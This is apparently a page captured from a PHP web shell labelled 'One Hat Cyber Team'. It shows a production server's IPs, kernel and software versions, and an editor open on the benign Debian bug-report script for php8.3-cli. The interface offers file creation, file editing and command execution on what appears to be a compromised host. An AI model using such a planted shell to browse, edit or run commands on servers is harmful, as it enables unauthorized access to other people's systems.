One Hat Cyber Team
Your IP :
3.135.223.70
Server IP :
104.21.64.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
bug
/
php8.3-cli
/
Edit File:
script
#!/bin/sh MATCH="^[[:space:]]*($|;)" echo "==== Additional PHP 8.3 information ====" >&3 echo "" >&3 echo "++++ PHP 8.3 SAPI (php8.3query -S): ++++" >&3 /usr/sbin/php8.3query -S >&3 echo "" >&3 echo "++++ PHP 8.3 Extensions (php8.3query -M -v): ++++" >&3 /usr/sbin/php8.3query -M -v >&3 echo "" >&3 echo "++++ Configuration files: ++++" >&3 "**** /etc/php/8.3/cli/php.ini ****" >&3 grep -Ev "$MATCH" /etc/php/8.3/cli/php.ini >&3 echo "" >&3 find /etc/php/8.3/cli/conf.d/ -name '*.ini' | \ while read CONF; do echo "**** $CONF ****" >&3 grep -Ev "$MATCH" "$CONF" >&3 echo "" >&3 done
Simpan